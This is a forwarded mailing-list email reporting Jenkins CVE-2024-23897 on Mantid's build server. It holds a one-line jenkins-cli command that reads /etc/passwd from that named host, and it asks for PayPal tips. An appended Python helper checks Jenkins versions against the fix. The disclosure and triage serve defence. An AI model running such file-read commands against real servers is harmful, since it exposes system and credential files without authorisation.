Forwarding on to Mantid DevOps. Could be spam, but best to double-check.
From: דוד בוזגלו via Mantid-help <mantid-help(a)mantidproject.org>
Sent: 27 January 2024 14:28
To: Mantid Help <mantid-help(a)mantidproject.org>
Subject: [Mantid-help] CVE-2024-23897 - builds.mantidproject.org - Jenkins arbitrary file read vulnerability
Hello,
My name is David and I am a security researcher.
Jenkins CVE-2024-23897: arbitrary file read vulnerability through the CLI, which can lead to RCE.
URL: https://builds.mantidproject.org
java -jar ./jenkins-cli.jar -s https://builds.mantidproject.org/ connect-node "@/etc/passwd"
[image.png]
Read more:
https://securityonline.info/cve-2024-23897-cvss-9-8-critical-jenkins-securi…
https://thehackernews.com/2024/01/critical-jenkins-vulnerability-exposes.ht…
https://github.com/jenkinsci/jenkins/commit/554f03782057c499c49bbb06575f0d2…
Liked my bug? Buy me a coffee (or more likely a beer x2):
https://www.paypal.com/paypalme/bugbounty1/150USD
https://www.paypal.com/paypalme/bugbounty1/75USD
https://www.buymeacoffee.com/bugbounty
Help me to continue to protect others' information.
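For the "double check" the forwarder asks for, an added triage helper (not part of the mail, and not Mantid or Jenkins project code): it reads the version Jenkins advertises in its X-Jenkins response header and decides whether that version predates the fix for CVE-2024-23897. The fixed versions (weekly 2.442, LTS 2.426.3) are taken from the Jenkins security advisory of 2024-01-24 and are not stated in the mail; the sample header values are constructed.

```python
"""Triage helper: is a Jenkins version affected by CVE-2024-23897?

Fixed versions per the Jenkins security advisory of 2024-01-24 (an
assumption, not stated in the forwarded mail): weekly 2.442, LTS 2.426.3.
Weekly releases have two components (2.441), LTS three (2.426.2), so the
two release lines are compared separately.
"""
import re

FIXED_WEEKLY = (2, 442)
FIXED_LTS = (2, 426, 3)
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?$")

def parse_version(version: str) -> tuple[int, ...]:
    """Parse 'MAJOR.MINOR' (weekly) or 'MAJOR.MINOR.PATCH' (LTS); reject
    anything else so an odd header value gets investigated, not assumed safe."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Jenkins version: {version!r}")
    return tuple(int(g) for g in m.groups() if g is not None)

def is_affected(version: str) -> bool:
    """True if this version predates the fix on its own release line."""
    v = parse_version(version)
    if len(v) == 3:                 # LTS line (e.g. 2.426.2)
        return v < FIXED_LTS
    return v < FIXED_WEEKLY         # weekly line (e.g. 2.441)

def triage(headers: dict[str, str]) -> str:
    """Summarise the X-Jenkins header of an HTTP response for a responder."""
    version = headers.get("X-Jenkins")
    if version is None:
        return "no X-Jenkins header: not obviously Jenkins, or header hidden"
    try:
        affected = is_affected(version)
    except ValueError as exc:
        return f"manual check needed: {exc}"
    state = "likely affected, patch or disable the CLI" if affected else "at or past fixed version"
    return f"Jenkins {version}: {state}"

if __name__ == "__main__":
    # Constructed sample responses, not captured from builds.mantidproject.org.
    for sample in ({"X-Jenkins": "2.426.2"}, {"X-Jenkins": "2.426.3"},
                   {"X-Jenkins": "2.441"}, {"X-Jenkins": "2.442"}, {}):
        print(triage(sample))
```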